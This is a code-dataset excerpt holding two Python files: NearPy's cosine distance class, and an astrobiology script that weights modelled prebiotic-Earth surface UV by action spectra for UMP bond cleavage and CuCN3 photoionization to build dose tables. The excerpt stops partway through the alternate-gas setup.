ml-lab/NearPy | nearpy/distances/cosine.py | 1 | 1649 | # -*- coding: utf-8 -*-
# Copyright (c) 2013 Ole Krause-Sparmann
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import numpy
import scipy
from nearpy.distances.distance import Distance
class CosineDistance(Distance):
""" Uses 1-cos(angle(x,y)) as distance measure. """
def distance(self, x, y):
"""
Computes distance measure between vectors x and y. Returns float.
"""
if scipy.sparse.issparse(x):
x = x.toarray().ravel()
y = y.toarray().ravel()
return 1.0 - numpy.dot(x, y) / (numpy.linalg.norm(x) *
numpy.linalg.norm(y))
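# Minimal usage sketch (added for illustration; the vectors below are arbitrary):
# parallel vectors give distance ~0.0 and orthogonal vectors give distance ~1.0.
if __name__ == '__main__':
    _dist = CosineDistance()
    print(_dist.distance(numpy.array([1.0, 0.0]), numpy.array([2.0, 0.0])))  # ~0.0
    print(_dist.distance(numpy.array([1.0, 0.0]), numpy.array([0.0, 3.0])))  # ~1.0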
| mit | 4,337,693,486,132,774,400 | 40.225 | 79 | 0.703457 | false |
sukritranjan/ranjansasselov2016b | compute_UV_doses.py | 1 | 29816 | # -*- coding: iso-8859-1 -*-
"""
This code is used to weigh the UV radiances we compute by biological action spectra.
"""
########################
###Import useful libraries
########################
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
import pdb
from matplotlib.pyplot import cm
from scipy import interpolate as interp
import scipy.integrate
########################
###Set physical constants
########################
hc=1.98645e-9 #value of h*c in erg*nm
def cm2inch(cm): #function to convert cm to inches; useful for complying with Astrobiology size guidelines
return cm/2.54
########################
###Decide which bits of the calculation will be run
########################
plotactionspec=False #if true, plots the action spectra we are using.
plotactionspec_talk=False #if true, plots the action spectra we are using...but, optimized for a talk instead of a paper
calculatealbaz=False #if true, generates the table for the albedo and zenith angle study
calculateco2=False #if true, generates the table for the co2 study
calculatealtgas=True #if true, generates the table for the alternate gas study
########################
###Helper functions: I/O
########################
def get_UV(filename):
"""
Input: filename (including path)
Output: (wave_leftedges, wav_rightedges, surface radiance) in units of (nm, nm, photons/cm2/sec/nm)
"""
wav_leftedges, wav_rightedges, wav, toa_intensity, surface_flux, surface_intensity, surface_intensity_diffuse, surface_intensity_direct=np.genfromtxt(filename, skip_header=1, skip_footer=0, usecols=(0, 1, 2,3,4,6,7,8), unpack=True)
surface_intensity_photons=surface_intensity*(wav/(hc))
return wav_leftedges, wav_rightedges, surface_intensity_photons
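#Unit-conversion note (illustrative): surface_intensity is an energy flux (erg/cm2/s/nm, as implied by
#the hc constant above), and a photon at wavelength lambda nm carries hc/lambda = 1.98645e-9/lambda erg,
#so multiplying by lambda/hc converts to photons/cm2/s/nm. E.g. at 200 nm one photon carries ~9.9e-12 erg,
#so 1 erg/cm2/s/nm corresponds to ~1.0e11 photons/cm2/s/nm.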
########################
###Helper functions: UV Dosimeters
########################
def integrated_radiance(wav_left, wav_right, surf_int, leftlim, rightlim):
"""
    Computes the surface radiance integrated from leftlim to rightlim. Does this by summing the per-bin radiance times the bin width. NOTE: The method I have chosen works only so long as the limits line up with the bin edges!
wav_left: left edge of wavelength bin, in nm
wav_right: right edge of wavelength bin, in nm
surf_int: total surface intensity (radiance, hemispherically-integrated) in photons/cm2/s/nm, in bin defined by wav_left and wav_right
    leftlim: left (short-wavelength) limit of integration, in nm; must coincide with a bin edge
    rightlim: right (long-wavelength) limit of integration, in nm; must coincide with a bin edge
"""
allowed_inds=np.where((wav_left>=leftlim) & (wav_right<=rightlim))
delta_wav=wav_right[allowed_inds]-wav_left[allowed_inds]
surf_int_integrated=np.sum(surf_int[allowed_inds]*delta_wav) #integration converts from photons/cm2/s/nm to photons/cm2/s
return surf_int_integrated
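#Minimal usage sketch (values are illustrative, not model output):
#   wav_left  = np.array([200., 210., 220.])
#   wav_right = np.array([210., 220., 230.])
#   surf_int  = np.array([1e12, 2e12, 3e12])  # photons/cm2/s/nm
#   integrated_radiance(wav_left, wav_right, surf_int, 200., 230.)  # -> 6e13 photons/cm2/s
#Limits that fall inside a bin (e.g. 205.) silently drop that partially-covered bin.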
def tricyano_aqe_prodrate(wav_left, wav_right, surf_int, lambda0, produceplots, returnxy):
"""
Weights the input surface intensities by the action spectrum for the photoproduction of aquated electrons from Ritson+2012 and Patel+2015, i.e. irradiation of tricyano cuprate. The action spectrum is composed of the absorption spectrum multiplied by an assumed quantum yield function. We assume the QY function to be a step function, stepping from 0 at wavelengths longer than lambda0 to 0.06 at wavelengths shorter than lambda0. We choose 0.06 for the step function to match the estimate found by Horvath+1984; we note this value may be pH sensitive. Empirically, we know that lambda0>254 nm, but that's about it.
    This process is a eustressor for abiogenesis.
wav_left: left edge of wavelength bin, in nm
wav_right: right edge of wavelength bin, in nm
surf_int: total surface intensity (radiance, hemispherically-integrated) in photons/cm2/s/nm, in bin defined by wav_left and wav_right
lambda0: value assume for lambda0.
produceplots: if True, shows plots of what it is computing
returnxy: if True, returns x,y for action spectrum.
"""
####Step 1: reduce input spectrum to match bounds of available dataset.
int_min=190.0 #This lower limit of integration is set by the limits of the cucn3 absorption dataset (left edge of bin)
int_max=351.0 #This upper limit of integration is set by the limits of the cucn3 absorption dataset (right edge of bin)
allowed_inds=np.where((wav_left>=int_min) & (wav_right<=int_max)) #indices that correspond to included data
wav_left=wav_left[allowed_inds]
wav_right=wav_right[allowed_inds]
surf_int=surf_int[allowed_inds]
delta_wav=wav_right-wav_left #size of wavelength bins in nm
####Step 2: form the action spectrum from the absorption spectrum and QY curve.
#Import the tricyanocuprate absorption spectrum
importeddata=np.genfromtxt('./Raw_Data/Magnani_Data/CuCN3_XC.dat', skip_header=2)
cucn3_wav=importeddata[:,0] #wav in nm
cucn3_molabs=importeddata[:,1] #molar absorptivities in L/(mol*cm), decadic
cucn3_molabs_func=interp.interp1d(cucn3_wav, cucn3_molabs, kind='linear') #functionalized form of cucn3 molar absorption
#does not matter if you use decadic or natural logarithmic as constant factors normalize out anyway
#Formulate the step-function quantum yield curve
def qy_stepfunc(wav, lambda0): #step function, for the photoionization model
"""Returns 1 for wav<=lambda0 and 0 for wav>lambda0"""
qy=np.zeros(np.size(wav))# initialize all to zero
inds=np.where(wav<=lambda0) #indices where the wavelength is below the threshold
qy[inds]=qy[inds]+0.06 #increase the QE to 1 at the indices where the wavelength is below the threshold
return qy
#Integrate these quantities to match the input spectral resolution
qy_dist=np.zeros(np.shape(wav_left))#initialize variable to hold the QY integrated over the surface intensity wavelength bins
    cucn3_molabs_dist=np.zeros(np.shape(wav_left))#initialize variable to hold the CuCN3 molar absorptivity integrated over the surface intensity wavelength bins
for ind in range(0, len(wav_left)):
leftedge=wav_left[ind]
rightedge=wav_right[ind]
cucn3_molabs_dist[ind]=scipy.integrate.quad(cucn3_molabs_func, leftedge, rightedge, epsabs=0, epsrel=1e-5)[0]/(rightedge-leftedge)
qy_dist[ind]=scipy.integrate.quad(qy_stepfunc, leftedge, rightedge, args=(lambda0), epsabs=0, epsrel=1e-5)[0]/(rightedge-leftedge)
action_spectrum=cucn3_molabs_dist*qy_dist
    #Normalize action spectrum to 1 at 190 nm (arbitrary)
action_spectrum=action_spectrum*(1./(np.interp(190., 0.5*(wav_left+wav_right), action_spectrum)))
####Step 3: Compute action-spectrum weighted total intensity
weighted_surface_intensity=surf_int*action_spectrum
total_weighted_radiance=np.sum(weighted_surface_intensity*delta_wav) #units: photons/cm2/s
####Step 4 (Optional): Plot various components of action spectrum to show the multiplication
if produceplots:
legendfontsize=12
axisfontsize=12
##Plot ribonucleotide absorption and interpolation
fig1, axarr=plt.subplots(3,2,sharex=True, figsize=(8., 10.5)) #specify figure size (width, height) in inches
axarr[0,0].bar(wav_left, surf_int,width=delta_wav, color='black', alpha=0.5, log=True)
axarr[0,0].set_ylim([1e10,1e16])
axarr[0,0].legend(loc=2, prop={'size':legendfontsize})
axarr[0,0].yaxis.grid(True)
axarr[0,0].xaxis.grid(True)
axarr[0,0].set_ylabel('Surface Radiance \n(photons cm$^{-2}$s$^{-1}$nm$^{-1}$)', fontsize=axisfontsize)
#axarr[0,0].title.set_position([0.5, 1.11])
#axarr[0,0].text(0.5, 1.1, r'a(i)', transform=axarr[0].transAxes, va='top')
axarr[1,0].bar(wav_left, cucn3_molabs_dist,width=delta_wav, color='black', alpha=0.5, log=True)
#axarr[1,0].set_ylim([-0.1, 1.1])
axarr[1,0].legend(loc=6, prop={'size':legendfontsize})
axarr[1,0].yaxis.grid(True)
axarr[1,0].xaxis.grid(True)
axarr[1,0].set_ylabel('CuCN3 Molar Absorptivity\n(M$^{-1}$cm$^{-1}$)', fontsize=axisfontsize)
#axarr[1,0].text(0.5, 1.10, r'b(i)', fontsize=12, transform=axarr[1].transAxes, va='top')
axarr[2,0].bar(wav_left, qy_dist,width=delta_wav, color='black', alpha=0.5)
axarr[2,0].set_ylim([-0.01, 0.06])
axarr[2,0].legend(loc=6, prop={'size':legendfontsize})
axarr[2,0].yaxis.grid(True)
axarr[2,0].xaxis.grid(True)
axarr[2,0].set_ylabel('Quantum Efficiency \n(reductions absorption$^{-1}$)', fontsize=axisfontsize)
#axarr[2,0].text(0.5, 1.10, r'c(i)', fontsize=12,transform=axarr[2].transAxes, va='top')
axarr[0,1].bar(wav_left, action_spectrum,width=delta_wav, color='black', alpha=0.5)
#axarr[0,1].set_ylim([-0.1, 1.1])
axarr[0,1].legend(loc=6, prop={'size':legendfontsize})
axarr[0,1].yaxis.grid(True)
axarr[0,1].xaxis.grid(True)
axarr[0,1].set_ylabel('Action Spectrum', fontsize=axisfontsize)
#axarr[0,1].text(0.5, 1.10, r'b(i)', fontsize=12, transform=axarr[1].transAxes, va='top')
axarr[1,1].bar(wav_left, weighted_surface_intensity,width=delta_wav, color='black', alpha=0.5)
#axarr[1,1].set_ylim([-0.1, 1.1])
axarr[1,1].legend(loc=6, prop={'size':legendfontsize})
axarr[1,1].yaxis.grid(True)
axarr[1,1].xaxis.grid(True)
axarr[1,1].set_ylabel('Weighted Surface Radiance', fontsize=axisfontsize)
#axarr[1,1].text(0.5, 1.10, r'b(i)', fontsize=12, transform=axarr[1].transAxes, va='top')
#plt.savefig('/home/sranjan/Python/UV/Plots/ritson_assumed_qe_v3.pdf', orientation='portrait',papertype='letter', format='pdf')
plt.show()
if returnxy:
return 0.5*(wav_left+wav_right), action_spectrum
else:
return total_weighted_radiance
def ump_glycosidic_photol(wav_left, wav_right, surf_int, lambda0, produceplots, returnxy):
"""
    Weights the input surface intensities by the action spectrum for cleavage of the glycosidic bond in UMP (the U-RNA monomer), aka base release. We form this spectrum by convolving the pH=7.6 absorption spectrum for Uridine-3'-(2')-phosphoric acid (i.e. uridylic acid, UMP) from Voet et al (1963) with an assumed QY curve. The QY curve is based on the work of Gurzadyan and Gorner (1994); they measure (wavelength, QY) for N-glycosidic bond cleavage in UMP in anoxic aqueous solution (Ar-suffused) to be (193 nm, 4.3e-3) and (254 nm, (2-3)e-5). Specifically, we assume that QY=4.3e-3 for lambda<=lambda_0 and QY=2.5e-5 for lambda>lambda_0. Natural choices of lambda_0 are 194, 254, and 230 (first two: empirical limits. Last: end of pi-pi* absorption band; Sinsheimer+1949 suggest it is onset of irreversible photolytic damage).
This process is a stressor for abiogenesis.
wav_left: left edge of wavelength bin, in nm
wav_right: right edge of wavelength bin, in nm
surf_int: total surface intensity (radiance, hemispherically-integrated) in photons/cm2/s/nm, in bin defined by wav_left and wav_right
lambda0: value assume for lambda0.
produceplots: if True, shows plots of what it is computing
returnxy: if True, returns x,y for action spectrum.
"""
####Step 1: reduce input spectrum to match bounds of available dataset (absorption).
    int_min=184.0 #This lower limit of integration is set by the limits of the UMP absorption dataset (left edge of bin)
    int_max=299.0 #This upper limit of integration is set by the limits of the UMP absorption dataset (right edge of bin)
allowed_inds=np.where((wav_left>=int_min) & (wav_right<=int_max)) #indices that correspond to included data
wav_left=wav_left[allowed_inds]
wav_right=wav_right[allowed_inds]
surf_int=surf_int[allowed_inds]
delta_wav=wav_right-wav_left #size of wavelength bins in nm
####Step 2: form the action spectrum from the absorption spectrum and QY curve.
#Import the UMP absorption spectrum from Voet et al 1963
importeddata=np.genfromtxt('./Raw_Data/Voet_Data/ribouridine_pH_7.3_v2.txt', skip_header=0, delimiter=',')
ump_wav=importeddata[:,0] #wav in nm
ump_molabs=importeddata[:,1] #molar absorptivities\times 10^{3}, i.e. in units of 10^{-3} L/(mol*cm), decadic (I think -- unit scheme unclear in paper. Not important since normalized out)
ump_molabs_func=interp.interp1d(ump_wav, ump_molabs, kind='linear') #functionalized form of molar absorption
#does not matter if you use decadic or natural logarithmic as constant factors normalize out anyway
#Formulate the step-function quantum yield curve
def qy_stepfunc(wav, lambda0): #step function, for the photoionization model
"""QY based on work of Gurzadyan and Gorner 1994"""
qy=np.zeros(np.size(wav))# initialize all to zero
inds1=np.where(wav<=lambda0) #indices where the wavelength is below the threshold
        inds2=np.where(wav>lambda0) #indices where the wavelength is above the threshold
qy[inds1]=qy[inds1]+4.3e-3 #High QY for lambda<=lambda0
qy[inds2]=qy[inds2]+2.5e-5 #Low QY for lambda>lambda0
return qy
#Integrate these quantities to match the input spectral resolution
qy_dist=np.zeros(np.shape(wav_left))#initialize variable to hold the QY integrated over the surface intensity wavelength bins
ump_molabs_dist=np.zeros(np.shape(wav_left))#initialize variable to hold the UMP absorption integrated over the surface intensity wavelength bins
for ind in range(0, len(wav_left)):
leftedge=wav_left[ind]
rightedge=wav_right[ind]
ump_molabs_dist[ind]=scipy.integrate.quad(ump_molabs_func, leftedge, rightedge, epsabs=0, epsrel=1e-5)[0]/(rightedge-leftedge)
qy_dist[ind]=scipy.integrate.quad(qy_stepfunc, leftedge, rightedge, args=(lambda0),epsabs=0, epsrel=1e-5)[0]/(rightedge-leftedge)
action_spectrum=ump_molabs_dist*qy_dist
    #Normalize action spectrum to 1 at 190 nm (arbitrary)
action_spectrum=action_spectrum*(1./(np.interp(190., 0.5*(wav_left+wav_right), action_spectrum)))
####Step 3: Compute action-spectrum weighted total intensity
weighted_surface_intensity=surf_int*action_spectrum
total_weighted_radiance=np.sum(weighted_surface_intensity*delta_wav) #units: photons/cm2/s
####Step 4 (Optional): Plot various components of action spectrum to show the multiplication
if produceplots:
legendfontsize=12
axisfontsize=12
##Plot ribonucleotide absorption and interpolation
fig1, axarr=plt.subplots(3,2,sharex=True, figsize=(8., 10.5)) #specify figure size (width, height) in inches
axarr[0,0].bar(wav_left, surf_int,width=delta_wav, color='black', alpha=0.5, log=True)
axarr[0,0].set_ylim([1e10,1e16])
axarr[0,0].legend(loc=2, prop={'size':legendfontsize})
axarr[0,0].yaxis.grid(True)
axarr[0,0].xaxis.grid(True)
axarr[0,0].set_ylabel('Surface Radiance \n(photons cm$^{-2}$s$^{-1}$nm$^{-1}$)', fontsize=axisfontsize)
#axarr[0,0].title.set_position([0.5, 1.11])
#axarr[0,0].text(0.5, 1.1, r'a(i)', transform=axarr[0].transAxes, va='top')
axarr[1,0].bar(wav_left, ump_molabs_dist,width=delta_wav, color='black', alpha=0.5, log=False)
#axarr[1,0].set_ylim([-0.1, 1.1])
axarr[1,0].legend(loc=6, prop={'size':legendfontsize})
axarr[1,0].yaxis.grid(True)
axarr[1,0].xaxis.grid(True)
axarr[1,0].set_ylabel('UMP Molar Absorptivity\n(M$^{-1}$cm$^{-1}$)', fontsize=axisfontsize)
#axarr[1,0].text(0.5, 1.10, r'b(i)', fontsize=12, transform=axarr[1].transAxes, va='top')
axarr[2,0].bar(wav_left, qy_dist,width=delta_wav, color='black', alpha=0.5, log=True)
axarr[2,0].set_ylim([1e-5, 1e-2])
axarr[2,0].legend(loc=6, prop={'size':legendfontsize})
axarr[2,0].yaxis.grid(True)
axarr[2,0].xaxis.grid(True)
axarr[2,0].set_ylabel('Quantum Efficiency \n(reductions absorption$^{-1}$)', fontsize=axisfontsize)
#axarr[2,0].text(0.5, 1.10, r'c(i)', fontsize=12,transform=axarr[2].transAxes, va='top')
axarr[0,1].bar(wav_left, action_spectrum,width=delta_wav, color='black', alpha=0.5)
#axarr[0,1].set_ylim([-0.1, 1.1])
axarr[0,1].legend(loc=6, prop={'size':legendfontsize})
axarr[0,1].yaxis.grid(True)
axarr[0,1].xaxis.grid(True)
axarr[0,1].set_ylabel('Action Spectrum', fontsize=axisfontsize)
#axarr[0,1].text(0.5, 1.10, r'b(i)', fontsize=12, transform=axarr[1].transAxes, va='top')
axarr[1,1].bar(wav_left, weighted_surface_intensity,width=delta_wav, color='black', alpha=0.5)
#axarr[1,1].set_ylim([-0.1, 1.1])
axarr[1,1].legend(loc=6, prop={'size':legendfontsize})
axarr[1,1].yaxis.grid(True)
axarr[1,1].xaxis.grid(True)
axarr[1,1].set_ylabel('Weighted Surface Radiance', fontsize=axisfontsize)
#axarr[1,1].text(0.5, 1.10, r'b(i)', fontsize=12, transform=axarr[1].transAxes, va='top')
#plt.savefig('/home/sranjan/Python/UV/Plots/ritson_assumed_qe_v3.pdf', orientation='portrait',papertype='letter', format='pdf')
plt.show()
if returnxy:
return 0.5*(wav_left+wav_right), action_spectrum
else:
return total_weighted_radiance
########################
###Plot UV Dosimeters
########################
if plotactionspec:
#Set up wavelength scale
wave_left=np.arange(100., 500.)
wave_right=np.arange(101., 501.)
wave_centers=0.5*(wave_left+wave_right)
surf_int=np.ones(np.shape(wave_centers)) #for our purposes here, this is a thunk.
#Extract action spectra
wav_gly_193, actspec_gly_193=ump_glycosidic_photol(wave_left, wave_right, surf_int, 193., False, True)
wav_gly_230, actspec_gly_230=ump_glycosidic_photol(wave_left, wave_right, surf_int, 230., False, True)
wav_gly_254, actspec_gly_254=ump_glycosidic_photol(wave_left, wave_right, surf_int, 254., False, True)
wav_aqe_254, actspec_aqe_254=tricyano_aqe_prodrate(wave_left, wave_right, surf_int, 254., False, True)
wav_aqe_300, actspec_aqe_300=tricyano_aqe_prodrate(wave_left, wave_right, surf_int, 300., False, True)
#####Plot action spectra
#Initialize Figure
fig, (ax1)=plt.subplots(1, figsize=(cm2inch(16.5),6), sharex=True)
colorseq=iter(cm.rainbow(np.linspace(0,1,5)))
#Plot Data
ax1.plot(wav_gly_193,actspec_gly_193, linestyle='-',linewidth=2, color=next(colorseq), label=r'UMP Gly Bond Cleavage ($\lambda_0=193$)')
ax1.plot(wav_gly_230,actspec_gly_230, linestyle='-',linewidth=2, color=next(colorseq), label=r'UMP Gly Bond Cleavage ($\lambda_0=230$)')
ax1.plot(wav_gly_254,actspec_gly_254, linestyle='-',linewidth=2, color=next(colorseq), label=r'UMP Gly Bond Cleavage ($\lambda_0=254$)')
ax1.plot(wav_aqe_254,actspec_aqe_254, linestyle='-',linewidth=2, color=next(colorseq), label=r'CuCN$_{3}$$^{2-}$ Photoionization ($\lambda_0=254$)')
ax1.plot(wav_aqe_300,actspec_aqe_300, linestyle='--',linewidth=2, color=next(colorseq), label=r'CuCN$_{3}$$^{2-}$ Photoionization ($\lambda_0=300$)')
#####Finalize and save figure
ax1.set_title(r'Action Spectra')
ax1.set_xlim([180.,360.])
ax1.set_xlabel('nm')
ax1.set_ylabel(r'Relative Sensitivity')
ax1.set_yscale('log')
ax1.set_ylim([1e-6, 1e2])
#ax1.legend(bbox_to_anchor=[0, 1.1, 1,1], loc=3, ncol=2, mode='expand', borderaxespad=0., fontsize=10)
ax1.legend(loc='upper right', ncol=1, fontsize=10)
plt.tight_layout(rect=(0,0,1,1))
plt.savefig('./Plots/actionspectra.eps', orientation='portrait',papertype='letter', format='eps')
if plotactionspec_talk:
#Set up wavelength scale
wave_left=np.arange(100., 500.)
wave_right=np.arange(101., 501.)
wave_centers=0.5*(wave_left+wave_right)
surf_int=np.ones(np.shape(wave_centers)) #for our purposes here, this is a thunk.
#Extract action spectra
wav_gly_193, actspec_gly_193=ump_glycosidic_photol(wave_left, wave_right, surf_int, 193., False, True)
wav_gly_230, actspec_gly_230=ump_glycosidic_photol(wave_left, wave_right, surf_int, 230., False, True)
wav_gly_254, actspec_gly_254=ump_glycosidic_photol(wave_left, wave_right, surf_int, 254., False, True)
wav_aqe_254, actspec_aqe_254=tricyano_aqe_prodrate(wave_left, wave_right, surf_int, 254., False, True)
wav_aqe_300, actspec_aqe_300=tricyano_aqe_prodrate(wave_left, wave_right, surf_int, 300., False, True)
#####Plot action spectra
#Initialize Figure
fig, (ax1)=plt.subplots(1, figsize=(10,9), sharex=True)
colorseq=iter(cm.rainbow(np.linspace(0,1,5)))
#Plot Data
ax1.plot(wav_gly_193,actspec_gly_193, linestyle='-',linewidth=3, color=next(colorseq), label=r'UMP-193')
ax1.plot(wav_gly_230,actspec_gly_230, linestyle='-',linewidth=3, color=next(colorseq), label=r'UMP-230')
ax1.plot(wav_gly_254,actspec_gly_254, linestyle='-',linewidth=3, color=next(colorseq), label=r'UMP-254')
ax1.plot(wav_aqe_254,actspec_aqe_254, linestyle='-',linewidth=3, color=next(colorseq), label=r'CuCN3-254')
ax1.plot(wav_aqe_300,actspec_aqe_300, linestyle='--',linewidth=3, color=next(colorseq), label=r'CuCN3-300')
#####Finalize and save figure
ax1.set_title(r'Action Spectra', fontsize=24)
ax1.set_xlim([180.,360.])
ax1.set_xlabel('nm',fontsize=24)
ax1.set_ylabel(r'Relative Sensitivity', fontsize=24)
ax1.set_yscale('log')
ax1.set_ylim([1e-6, 1e2])
ax1.legend(bbox_to_anchor=[0, 1.1, 1,0.5], loc=3, ncol=2, mode='expand', borderaxespad=0., fontsize=24)
#ax1.legend(loc='upper right', ncol=1, fontsize=16)
ax1.xaxis.set_tick_params(labelsize=24)
ax1.yaxis.set_tick_params(labelsize=24)
plt.tight_layout(rect=(0,0,1,0.75))
plt.savefig('./TalkFigs/actionspectra.pdf', orientation='portrait',papertype='letter', format='pdf')
########################
###Set "base" values to normalize the alb-zen, co2, and alt-gas dosimeters by
########################
#Use the TOA flux in order to get a good, physically understandable denominator.
wav_leftedges, wav_rightedges, wav, toa_intensity=np.genfromtxt('./TwoStreamOutput/AlbZen/rugheimer_earth_epoch0_a=0.2_z=60.dat', skip_header=1, skip_footer=0, usecols=(0, 1,2, 3), unpack=True)
toa_intensity_photons=toa_intensity*(wav/(hc))
#Compute base doses
intrad100_165_base=integrated_radiance(wav_leftedges, wav_rightedges, toa_intensity_photons, 100, 165.) #This measures the flux vulnerable to activity
intrad200_300_base=integrated_radiance(wav_leftedges, wav_rightedges, toa_intensity_photons, 200., 300.) #This is just an empirical gauge.
umpgly_193_base=ump_glycosidic_photol(wav_leftedges, wav_rightedges, toa_intensity_photons, 193., False, False)
umpgly_230_base=ump_glycosidic_photol(wav_leftedges, wav_rightedges, toa_intensity_photons,230., False, False)
umpgly_254_base=ump_glycosidic_photol(wav_leftedges, wav_rightedges, toa_intensity_photons, 254., False, False)
tricyano254_base=tricyano_aqe_prodrate(wav_leftedges, wav_rightedges, toa_intensity_photons, 254., False, False)
tricyano300_base=tricyano_aqe_prodrate(wav_leftedges, wav_rightedges, toa_intensity_photons, 300., False, False)
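#Each dosimeter computed below is reported relative to these top-of-atmosphere values, so a tabulated
#value of e.g. 0.01 means the surface dose is ~1% of the dose delivered by unattenuated sunlight.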
########################
###Run code for albedo, zenith angle
########################
if calculatealbaz:
#Evaluate only two zenith angles (to show range of variation)
zenithangles=['66.5', '0']
albedos=['tundra', 'ocean', 'desert', 'oldsnow', 'newsnow']
for zenind in range(0, len(zenithangles)):
zenithangle=zenithangles[zenind]
for albind in range(0, len(albedos)):
albedo=albedos[albind]
datafile='./TwoStreamOutput/AlbZen/rugheimer_earth_epoch0_a='+albedo+'_z='+zenithangle+'.dat'
left, right, surface_int=get_UV(datafile)
intrad100_165=integrated_radiance(left, right, surface_int, 100, 165.) #This measures the flux vulnerable to activity
intrad200_300=integrated_radiance(left, right, surface_int, 200., 300.) #This is just an empirical gauge.
umpgly_193=ump_glycosidic_photol(left, right, surface_int, 193., False, False)
umpgly_230=ump_glycosidic_photol(left, right, surface_int,230., False, False)
umpgly_254=ump_glycosidic_photol(left, right, surface_int, 254., False, False)
tricyano254=tricyano_aqe_prodrate(left, right, surface_int, 254., False, False)
tricyano300=tricyano_aqe_prodrate(left, right, surface_int, 300., False, False)
line=np.array([zenithangle, albedo, intrad100_165/intrad100_165_base,intrad200_300/intrad200_300_base, umpgly_193/umpgly_193_base, umpgly_230/umpgly_230_base, umpgly_254/umpgly_254_base, tricyano254/tricyano254_base, tricyano300/tricyano300_base])
if (albind==0 and zenind==0):
albzentable=line #need to initialize in this case
else:
albzentable=np.vstack((albzentable, line))
#Save output
f=open('./Doses/albzen_uv_doses.dat','w')
f.write('All Dosimeters Normalized to Space Radiation Case\n')
np.savetxt(f, albzentable, delimiter=' ', fmt='%s', newline='\n', header='Zenith Angle & Albedo & Radiance (100-165 nm) & Radiance (200-300 nm) & UMP Gly Cleavage (lambda0=193nm) & UMP Gly Cleavage (lambda0=230nm) & UMP Gly Cleavage (lambda0=254nm) & CuCN3 Photoionization (lambda0=254 nm) & CuCN3 Photoionization (lambda0=300 nm)\n')
f.close()
########################
###Run code for varying CO2 levels
########################
if calculateco2:
N_co2_rugh=2.09e24 #column density of CO2 in Rugheimer base model (cm**-2)
co2multiples=np.array([0., 1.e-6,1.e-5, 1.e-4, 1.e-3, 0.00893, 1.e-2, 1.e-1, 0.6, 1., 1.33, 1.e1, 46.6, 1.e2, 470., 1.e3])
zenithangles=['0', '66.5']
albedos=['newsnow', 'tundra']
for surfind in range(0, len(zenithangles)):
albedo=albedos[surfind]
zenithangle=zenithangles[surfind]
for multind in range(0, len(co2multiples)):
multiple=co2multiples[multind]
colden_co2=N_co2_rugh*multiple
datafile='./TwoStreamOutput/CO2lim/surface_intensities_co2limits_co2multiple='+str(multiple)+'_a='+albedo+'_z='+zenithangle+'.dat'
left, right, surface_int=get_UV(datafile)
intrad100_165=integrated_radiance(left, right, surface_int, 100, 165.) #This measures the flux vulnerable to activity
intrad200_300=integrated_radiance(left, right, surface_int, 200., 300.) #This is just an empirical gauge.
umpgly_193=ump_glycosidic_photol(left, right, surface_int, 193., False, False)
umpgly_230=ump_glycosidic_photol(left, right, surface_int,230., False, False)
umpgly_254=ump_glycosidic_photol(left, right, surface_int, 254., False, False)
tricyano254=tricyano_aqe_prodrate(left, right, surface_int, 254., False, False)
tricyano300=tricyano_aqe_prodrate(left, right, surface_int, 300., False, False)
#print intrad200_300
#pdb.set_trace()
line=np.array([zenithangle, albedo, colden_co2, intrad100_165/intrad100_165_base,intrad200_300/intrad200_300_base, umpgly_193/umpgly_193_base, umpgly_230/umpgly_230_base, umpgly_254/umpgly_254_base, tricyano254/tricyano254_base, tricyano300/tricyano300_base])
if (multind==0 and surfind==0):
co2table=line #need to initialize in this case
else:
co2table=np.vstack((co2table, line))
#Save Output
f=open('./Doses/co2_uv_doses.dat','w')
f.write('All Dosimeters Normalized to Space Radiation Case\n')
    np.savetxt(f, co2table, delimiter=' ', fmt='%s', newline='\n', header='Zenith Angle & Albedo & CO2 Column Density (cm-2) & Radiance (100-165 nm) & Radiance (200-300 nm) & UMP Gly Cleavage (lambda0=193nm) & UMP Gly Cleavage (lambda0=230nm) & UMP Gly Cleavage (lambda0=254nm) & CuCN3 Photoionization (lambda0=254 nm) & CuCN3 Photoionization (lambda0=300 nm)\n')
f.close()
########################
###Run code for alternate gas absorption.
########################
if calculatealtgas:
#####Set up info about the files to extract # All are the maximum possible natural surface radiance case (z=0, albedo=fresh snow) aka "max"
N_tot=2.0925e25#total column density of Rugheimer+2015 model in cm**-2
gaslist=['h2o', 'ch4', 'so2', 'o2', 'o3', 'h2s'] #list of gases we are doing this for
base_abundances=np.array([4.657e-3, 1.647e-6, 3.548e-11, 2.241e-6, 8.846e-11, 7.097e-11]) #molar concentration of each of these gases in the Rugheimer model.
gasmultiples={}#dict holding the multiples of the molar concentration we are using
gasmultiples['h2o']=np.array([1.e-5, 1.e-4, 1.e-3, 1.e-2, 1.e-1, 1., 1.e1, 1.e2, 1.e3, 1.e4, 1.e5])
gasmultiples['ch4']=np.array([1.e-5, 1.e-4, 1.e-3, 1.e-2, 1.e-1, 1., 1.e1, 1.e2, 1.e3, 1.e4, 1.e5])
gasmultiples['so2']=np.array([1.e-5, 1.e-4, 1.e-3, 1.e-2, 1.e-1, 1., 1.e1, 1.e2, 1.e3, 1.e4, 1.e5, 1.e6, 1.e7])
gasmultiples['o2']=np.array([1.e-5, 1.e-4, 1.e-3, 1.e-2, 1.e-1, 1., 1.e1, 1.e2, 1.e3, 1.e4, 1.e5])
gasmultiples['o3']=np.array([1.e-5, 1.e-4, 1.e-3, 1.e-2, 1.e-1, 1., 1.e1, 1.e2, 1.e3, 1.e4, 1.e5])
